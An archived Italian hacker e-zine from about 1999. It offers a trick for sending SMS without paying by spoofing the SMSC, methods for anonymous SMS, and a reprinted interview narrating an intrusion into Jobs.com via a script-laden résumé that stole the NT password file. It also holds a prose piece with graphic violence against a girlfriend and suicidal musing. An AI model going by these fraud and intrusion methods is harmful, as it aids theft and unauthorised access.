____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____
||A |||T |||T |||I |||L |||A |||_ |||H |||A |||C |||K ||
||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|

Url: http://www.attilahack.cjb.net
mailing list: attila_hack@egroups.com
e-mail: attila_hack@hotmail.com
newsgroup: alt.hackers.attila_hack
(solo dal news server: news.tiscalinet.it)
irc: #hack-it, #muretto, #crack-it, #wannabe,
#attila_hk, #it@lia, #phreak-it








+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-



SMS GRATIS, DA CELLULARE A CELLULARE: Pietro S.



Provate ad impostare come SMSC +4792001000 (Netcom) ed ad inviare un SMS verso un utente
TIM. Risultato: su alcuni numeri (il mio per esempio, ho la Tim Card!) dopo circa 30 secondi
viene fuori "Messaggio non inviato" ... ma il messaggio ha già raggiunto il destinatario
ed io non ho pagato una lira!N.B: Da TIM CARD mia a numeri TIM = OK, da mio Libero a
numeri TIM = OK ma non da quello della mia ragazza, lì dice subito "Messaggio non inviato"
e non arriva nulla.Fate qualche prova e fatemi sapere.

Pietro S. (Spaghetti Phreaker Team)



+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-


SMS GRATIS, DA INTERNET A CELLULARE: BoBo


Puntate il vostro browser su:

www.mtnsms.com

seguite le istruzioni per registrarvi e potrete mandare tutti i messaggi che volete.
Non abusatene troppo però sennò la telecom, che registra tutti i mesaggi che inviamo
dal server non ci potrebbe far più usufruire di questo servizio.

Ricordate, PENSATE AL FUTURO!!!

BoBo

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-


COME MANDARE SMS ANONIMI: The Crazy


Anche il precedente articolo "SMS GRATIS, DA INTERNET A CELLULARE" puo essere utilizzato per
mandare SMS Anonimi. Un altro metodo è quello di mandare il messaggio tramite internet o
collegamento con un modem, ttraverso un programma terminale come hyper terminal di winzoz,
al numero +393359609600.

The Crazy


+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-





_ \_) _| | _) _) | |
/ | _| | -_)(_-<(_-< | _ \ \ | _` | -_) |
_|_\_|_| _|\___|___/___/_|\___/_| _|_| \__,_|\___|_|BoBo & LaNdo

\ \ / | | _| _|
\ \ \ / _` | \ \ _` | _ \ -_) (_-< _| _` | _| _|
\_/\_/\__,_|_| _|_| _|\__,_|_.__/\___| ___/\__|\__,_|_| _|





Inutile: by S2



Un blocco di testo inutile.

Sono seduto sulla mia poltrona di pelle davanti alla scrivania, sulla quale un portacenere
stracolmo di cicche, una me la sto fumando proprio ora, un bozza di vodka alla pesca mezza
vuota, un paio di calzetti sporchi in giro per la mia stanza, un paio di boxer, qualche
scheda video, audi, un cd-rom, un disco fisso da 140MB sparsi sul pavimento. Nello stereo
i Wizo. Un gruppo senza importanza. Siamo tutti senza importanza. Non serviamo a niente.
La guerra, la pace, l'amore. Tutto inutile. Viviamo, moriamo, ci seppelliscono. Tutto
inutile. Sono le 16.27, fuori c'è il sole ma ho le tapparelle semichiuse, e non mi passa
un cazzo. Perché? Sono stufo. Mi sono rotto. Ho imparato troppo in fretta. Ho già fatto
tutto. Non c'è più niente da fare. Niente da provare. Ho finito la cicca. L'ultimo tiro.
La spengo. Mi autolesiono con il fumo. Perché? Sono un masochista. Siamo tutti masochisti.
Masochisti e sadici. Tutti. Senza esclusioni. Io fumo. C'è chi beve. C'è che ci guida a
120 all'ora e passa con i semafori rossi. C'è chi si taglia le vene. C'è chi si fa trattare
male dal partner. Chi si fa picchiare. Chi subisce senza reagire. C'è chi non usa il
cervello. C'è chi si fa usare. C'è chi non ha idee proprie e chi ha le idee impostegli
da altri. C'è chi è senza palle e chi le tira fuori quando servono. Siamo tutti cattivi.
Nessuno è buono. Pensiamo solo ai nostri interessi. Un'altra cicca. La stanza è satura
di fumo. Pensiamo solo al guadagno. Perché abbiamo amici? Perché ci sono nel momento del
bisogno. Cioè? Ci danno qualcosa. Li sfruttiamo. Ci serviamo di loro. E loro si servono
di noi. Pensano solo ai loro interessi. Come noi. Non esiste nessuno che da senza
ricevere. Nessuno. Senza esclusioni. Spazi Web gratuiti? A patto che lo sponsor sia ben
visibile. La mia ragazza? A patto che le dia il suo orgasmo giornaliero. L'alcool? A
patto che gli dia le mie budella. Le cicche? In cambio dei polmoni o insieme a un cancro.
Il divertimento? In cambio di soldi. La famiglia? In cambio della lealtà. La vita? In
cambio della morte. E' giusto? Si. Tutto è giusto. Dipende dal punto di vista. Tutto
dipende. 2 per 0 quanto fa? 0? No. Cicca finita. Spenta. Un'altra. Due mele moltiplicate
per zero sono sempre due mele. Non nessuna. Dipende dal punto di vista. Tutto è giusto.
Tutto è sbagliato. Ci insegnano che è sbagliato rubare, uccidere, violentare, picchiare.
Se un assassino entra in un appartamento e uccide la madre, la figlia, il fratello è
cattivo? No. Non ha ucciso il padre. Poteva ucciderlo, ma non l'ha fatto. Perché? Forse
non è cattivo. Hittler è cattivo? Ha ucciso milioni di persone. Lui pensava con la sua
testa. Aveva idee sue. E' cattivo? Tutto dipende. Non c'è niente che ci possano insegnare.
Non c'è niente da apprendere. Tutto quello che c'è da sapere lo trovi nella tua testa.
La tua. Se la usi. Se la vuoi usare. Le scuole? Inutili. Un lavoro? Inutile. I soldi?
Inutili. Le amicizie? Inutili. L'amore? Inutile. L'odio? Forse non è inutile. Emozioni
forti, potenti, implacabili. Forse non sono inutili. Quelle. Perché? Bisogna sempre
chiedersi il perché. Sempre. Cicca spenta. Mai provato ad amare una ragazza così tanto
da riuscire a comunicarle l'amore che provi per lei attraverso un abbraccio? Un abbraccio
forte forte. Così forte da spezzarle la spina dorsale, spaccarle le costole, aprirla nel
mezzo e spappolarle le budella in giro per il pavimento. Guardarla in faccia e vedere che
della schiuma bianca le esce dalla bocca. Vedere i suoi bulbi oculari girarsi all'indietro.
Vederla morire e dirle "Ti amo.", per poi rimanere lì. Fermo. Immobile. Con lo sguardo
rivolto verso il basso. Stare lì a contemplare le sue interna spappolate sul pavimento.
Il suo sangue. E i tuoi piedi che sono proprio nel mezzo. Sangue ovunque. E pensare quanto
ami quell'ammasso di carne in giro per la stanza. Questa stanza. Mai visto le cose da questo
punto di vista? No? E ora? Ti ho fatto riflettere? Ti sei mai svegliato la mattina, spento
la radiosveglia, e fermato a riflettere? Perché ora mi alzo? Cosa devo fare di così
importante? Perché non posso continuare a dormire? Devo cambiare il mondo? Devo crearmi
una vita? Devo andare a scuola? Devo lavorare? Perché non posso dormire? Dormire per
sempre. Nel mio letto. Un caldo e avvolgente piumino. Le lenzuola pulite. Potrei svegliarmi
da qualche altra parte. In un altro posto. In un altro mondo. Dove quello che sogno è quello
che è. L'esistenza. I miei sogni il mondo. Potrei volare. Potrei amare. Potrei essere amato.
Potrei Vivere. Non sopravvivere come qui. Devo sopravvivere in un posto con regole fatte da
altri. E le devo rispettare. Devo sopravvivere in un posto dove i miei sogni non hanno
importanza. Dove le mie emozioni non hanno importanza. Ne hanno solo per me. E' sufficiente?
E' veramente così? Le mie emozioni importano a qualcuno? Alla mia ragazza? Ai miei genitori?
Si. In cambio rispettivamente di un orgasmo al giorno e lealtà. Che bella vita. Che bel
mondo. Dominato da capitalisti anarchici corrotti. Gente come me. Come te. Come tutti noi.
Non c'è niente che io possa fare o cambiare. E' solo un'utopia di molte persone. Non ho
neanche deciso di vivere. E' stato deciso per me. C'è solo una cosa che posso decidere io.
Quando finirla. Quando chiudere e dire basta. Alzare il volume dello stereo, sentire le note
che mi penetrano nel cervello, lo spappolano passando al resto del corpo, aprendolo dal-
l'interno per poi propagarsi nel mondo, portando lo stesso messaggio a tutti. Un messaggio
di benessere, di libertà, di morte. Forse sono pazzo. Forse no. Forse tutto questo è solo
un modo di pensare. Tutto è relativo. Anche il tempo. Anche lo spazio. Tutto. Forse tutto
quello che hai letto ora sono solo cazzate. Forse è il punto della questione. Forse è una
grande verità. Pensaci.

S2





+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-






PER NON DIMENTICARE (ATOMIC): by Away




Solo poche parole...

"Un girasole si chiede dove sia finito il sole.
Si gira da un lato e dall'altro, e non lo trova.

(L'immagine è focalizzata su di lui)

Sconsolato, abbassa lo sguardo,
mentre tutto si oscura intorno.

Una nube si diffonde all'orizzonte,
un'onda si propaga a velocità sempre maggiore verso la telecamera.

Dopo pochi attimi non rimane niente intorno,
del girasole resta soltanto una vaga traccia
- uno scheletro bruciato ancora con lo sguardo rivolto verso il basso -
mentre una nuova enorme nuvola a forma di fungo si solleva all'orizzonte,
sull'orizzonte di Mururoa."

...per non dimenticare.
Away Three Nails
"We are the voice.
Do not shut us out."





+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-



___ ___ ___ ___
/\__\ ___ /\__\ /\__\ /\ \BoBo & LaNdo
/:/ / /\ \ /::| | /:/ / \:\ \
/:/ / \:\ \ /:|:| | /:/__/ \:\ \
/:/ / /::\__\ /:/|:| |__ /::\__\____ \:\ \
/:/__/ __/:/\/__/ /:/ |:| /\__\ /:/\:::::\__\ _______\:\__\
\:\ \ /\/:/ / \/__|:|/:/ / \/_|:|~~|~ \::::::::/__/
\:\ \ \::/__/ |:/:/ / |:| | \:\~~\~~
\:\ \ \:\__\ |::/ / |:| | \:\ \
\:\__\ \/__/ /:/ / |:| | \:\__\
\/__/ \/__/ \|__| \/__/


LINKZ: by Reset (Attila_Hack MemberZ)

* Fa schifo lo metto solo per prenderlo per il culo
** ..ehmm meglio di niente
*** discreto
**** buono
***** sito ottimo
****** faigaxxata di sito (questo sito cià i controca**i)



Spaghetti Phreakers: http://come.to/Spaghettiphreakers *****

Il creatore del John the ripper: http://www.false.com/security/john/ ******

bfi: http://www.s0ftpj.org/bfi *****************

Il grande Cavallo de Cavallis: http://members.tripod.com/~CavallodeCavallis/ *****

Gli Spippolatori: http://www.spippolatori.com *****

MrZero: http://www2.sienanet.it/users/MrZeRo/choice.html ****

Il sito di Kalidor: www.kalidor.tsx.org ******

Ring Z3r0 (Reverse engeenering): http://ringzer0.cjb.net **********

Drac: http://www.infocom.it/drac/ (Sito ricco di crackz) ******

Il Sito del Grande Quequero: http://quequero.cjb.net (Un sito di un nostro MemberZ che smanetta
molto con il Reverse Engeenering! se non andate a vederlo siete morti!!!!!!) ***************

Valvoline crew: http://valvoline.cjb.net (Il sito dei nostri amici Valvoline,
Visitare Pleeese!!!!) ******************

Il sito di b0nu$: http://wurstel.ing.unibs.it/~bonus (Un altro sito di un nostro MemberZ
che smanetta molto con l'Assembler, assolutamente da visitare!) *****************

Boozed Toxin: http://web.interpuntonet.it/xj/ Il sito di T0rment0 che sforna una nuova e-zine

AntiSocial: http://AntiSocial.tsx.org ****

The Pac-Man: http://thepacman.tsx.org ****

Anarchy in the system: http://aisprod.tsx.org ***** (sito che sforna la rivista Anarchy in the
system) ****

Insecure: http://www.insecure.org/ ****

ZioMarzo : http://come.to/ziomarzo **** (ancora in allestimento)

Dislessici: http://www.dislessici.org/index.php3 **********

Artemis: http://62.52.93.180/Artemis_23am/ ****

LeLe: http://utenti.tripod.it/Lele_HomePage/default.htm ****

Bobbymetal: http://members.theglobe.com/Bobbymetal/ ***



Questa volta solo siti caxxuti:) Hi all - Reset (Attila-Hack MemberZ)
P.S. Se me ne sono perso qualcuno, scrivete a attila_hack@hotmail.com e provvederò;-).







+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-



_ _| | _) |BoBo & LaNdo
| __ \ __| _ \ __|\ \ / | __| __| _ \
| | | | __/ | \ \ / |\__ \ | __/
___|_| _|\__|\___|_| \_/ _|____/\__|\___|





Parla l'Hacker di Jobs.com: by Reset



Con Drago98 abbiamo discusso i dettagli della sua azione di hacking
portata via web sui server del frequentatissimo sito dedicato al
lavoro

Fonte: Punto Informatico - Stand By

27/8/1999 - Roma - Drago98 è un hacker italiano che ci ha contattato dopo aver
attaccato via internet un celebre sito internet, Jobs.com. Ecco l'intervista che
abbiamo realizzato.

D: quando hai aggredito il sito?
R: il 13 Agosto 1999 ore 9.40 (locale)

D: perchè hai scelto quel sito?
R: ho usato un loro prodotto e durante il suo utilizzo mi sono accorto del potenziale buco.

D: quali sistemi di sicurezza hai dovuto superare?
R: il sito è ben protetto, già alcuni "colleghi" avevano provato,
ma il proxy e la doppia scheda di rete rendevano le cose difficili,
con la mia intuizione non mi sono dovuto preoccupare di sfondare porte, ho sfruttato il buco
trovato.

D: hai lasciato tracce? Quali?
R: sì. Un messaggio nel event log di NT: "Error 9999 - Drago Was Here. I think that you
have need of a Hacker in your staff!"

D: è la prima volta che entri in un sito?
R: è la 6a volta, ma è il mio primo sito per grado di difficoltà e numero di accessi.

D: quanti anni hai? Dove vivi?
R: ho superato i 25 anni e vivo nel nord Italia.

D: cosa pensi dell'hacking di siti web? E del cracking?
R: credo nell'hacking come filosofia, ma non mi convince l'idea di creare difficoltà
(soprattutto economiche) a persone che non hanno abbastanza tempo o soldi per proteggersi
dai "monelli" dell'informatica. Credo nel light-hacking. E cioè chi entra, lascia il segno,
ma senza far danni, al massimo un backup di curiosità off-line.

D: hai rapporti con altri hacker o cracker?
R: è indispensabile avere rapporti (non sessuali!) con altri hacker.
La filosofia hacker pretende che le informazioni vengano condivise e passate a chi può
migliorare il valore della società hacker.
Per quanto riguarda il fatto, l'hacking c'è stato ed è stato visto. In
Jobs.com hanno allestito nuove politiche di sicurezza e tentare ora
significherebbe essere beccati (con una percentuale di rischio del 60%).
Per rispondere alla tua email devo loggarmi su una macchina "sicura" che poi ridireziona
l'email a hotmail. Non dimenticare che sulla loro home page, craccate ho lasciato
quest'account!
In ogni caso, ho ottenuto la gloria e il sostegno da tutta la comunità
hacker italiana e di alcuni pezzi (non tanto grossi) della
comunità hacker USA, in questo senso mi sento soddisfatto (se ce da esserlo :))

D: tecnicamente, come hai compiuto la tua azione?
R: la Jobs.com distribuisce un prodotto (scritto in Visual Basic) per la guida e il supporto
alla realizzazione di un Curriculum Vitae. Tempo fa ho trovato lavoro negli USA grazie a
quell'applicazione (che infame!! Sob!) e nell'uso mi accorsi che il prodotto offriva la
possibilità di allegare un documento al tuo curriculum, facendo opportuno controllo se
il file fosse di tipo binario o testuale.
Bene, ho decompilato (reverse engineering) il pacchetto (resume), ho scoperto il mail
sever che utilizzava e alcuni parametri che non avrei mai realizzato (data anche la
complessa fantasia del creatore)
e li ho usati per il mio hacking.
Ho compilato un Curriculum utilizzando quel prodotto (con un altra identità!!), ho
allegato un documento testuale con dentro NON le mie referenze ma uno script WSH (Window
Script Host) che viene interpretato da una DLL installata da NT Option Pack (devono avercela
tutti i sistemi WEB-NT).
Quando ho spedito il Curriculum (attraverso il programma), il mio script è arrivato nella
pancia del server, il processo automatico di smistamento curricula ha cercato di leggere il
file
per verificare se fosse un binario (potenzialmente infetto), nel tentativo di leggerlo NT si
è accorto dell'estensione eseguendo lo script.
Dopo 2.05667 secondi esatti mi è arrivato nel mio mail box un ringraziamento del mail server
per aver spedito il mio curriculum, con in attach la SAM (il file della sicurezza) di NT. A
quel punto con una utility della comunità ho tradotto la SAM, recuperato un account, sono
entrato, ho dato un occhio qui e là. Ho modificato la home page, lasciato il messaggio al
sistemista e avvertito un pò di amici e la comunità.
Ho emesso un grido per la gioia. I migliori hacking sono i più semplici, ma ben congegnati.

Intervista a cura di Paolo De Andreis ed è disponibile al sito:
http://www.deandreis.it/pin/standby/index/.htm

Si ringrazia per la gentile concessione Drago98

Saluti a tutti Reset A_H MemberZ




+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-


Hanno collaborato a questa e-zine: Mr_Skull, LaNdo, Zio Marzo, Away, LiQUID, Ritz,
S2, b0nu$, The Pac-Man, BugByte, Mr.Lamah, Quequero, ZioButtha, Reset, Spaghetti
Phreaker Team, The Crazy e BoBo.


_|
_|_|_|_| _| _| _| _| _| _|BoBo & LaNdo
_| _|_|_| _|_| _|_| _| _| _| _|
_|_|_| _| _| _| _|_|_|_| _| _| _| _| _|
_| _| _| _| _| _| _|_| _| _|
_| _| _| _| _|_|_| _| _| _|



------------------------------------------------------------
- __ __ ___.BoBo & LaNdo-
- / \ / \_____ ____ ____ _____ \_ |__ ____ -
- \ \/\/ /\__ \ / \ / \\__ \ | __ \_/ __ \ -
- \ / / __ \| | \ | \/ __ \| \_\ \ ___/ -
- \__/\ / (____ /___| /___| (____ /___ /\___ > -
- \/ \/ \/ \/ \/ \/ \/ -
------------------------------------------------------------


(¯`·.¸¸.·´¯`·.¸¸.-> Attila_Hack crew <-.¸¸.·´¯`·.¸¸.·´¯)
____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____
||A |||T |||T |||I |||L |||A |||_ |||H |||A |||C |||K ||
||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|

Url: http://www.attilahack.cjb.net
mailing list: attila_hack@egroups.com
e-mail: attila_hack@hotmail.com
newsgroup: alt.hackers.attila_hack
(solo dal news server: news.tiscalinet.it)
irc: #hack-it, #muretto, #crack-it, #wannabe,
#attila_hk, #it@lia, #phreak-it

next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

guest's profile picture
@guest
10 Nov 2024
الاسم : جابر حسين الناصح - السن :٤٢سنه - الموقف من التجنيد : ادي الخدمه - خبره عشرين سنه منهم عشر سنوات في كبرى الشركات بالسعوديه وعشر سنوات ...

lostcivilizations's profile picture
Lost Civilizations (@lostcivilizations)
6 Nov 2024
Thank you! I've corrected the date in the article. However, some websites list January 1980 as the date of death.

guest's profile picture
@guest
5 Nov 2024
Crespi died i april 1982, not january 1980.

guest's profile picture
@guest
4 Nov 2024
In 1955, the explorer Thor Heyerdahl managed to erect a Moai in eighteen days, with the help of twelve natives and using only logs and stone ...

guest's profile picture
@guest
4 Nov 2024
For what unknown reason did our distant ancestors dot much of the surface of the then-known lands with those large stones? Why are such cons ...

guest's profile picture
@guest
4 Nov 2024
The real pyramid mania exploded in 1830. A certain John Taylor, who had never visited them but relied on some measurements made by Colonel H ...

guest's profile picture
@guest
4 Nov 2024
Even with all the modern technologies available to us, structures like the Great Pyramid of Cheops could only be built today with immense di ...

lostcivilizations's profile picture
Lost Civilizations (@lostcivilizations)
2 Nov 2024
In Sardinia, there is a legend known as the Legend of Tirrenide. Thousands of years ago, there was a continent called Tirrenide. It was a l ...

guest's profile picture
@guest
2 Nov 2024
What is certain is that the first Greek geographer to clearly place the Pillars of Hercules at Gibraltar was Eratosthenes (who lived between ...

guest's profile picture
@guest
1 Nov 2024
Disquieting thc drinks has been quite the journey. As someone keen on unpretentious remedies, delving into the in every respect of hemp has ...
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT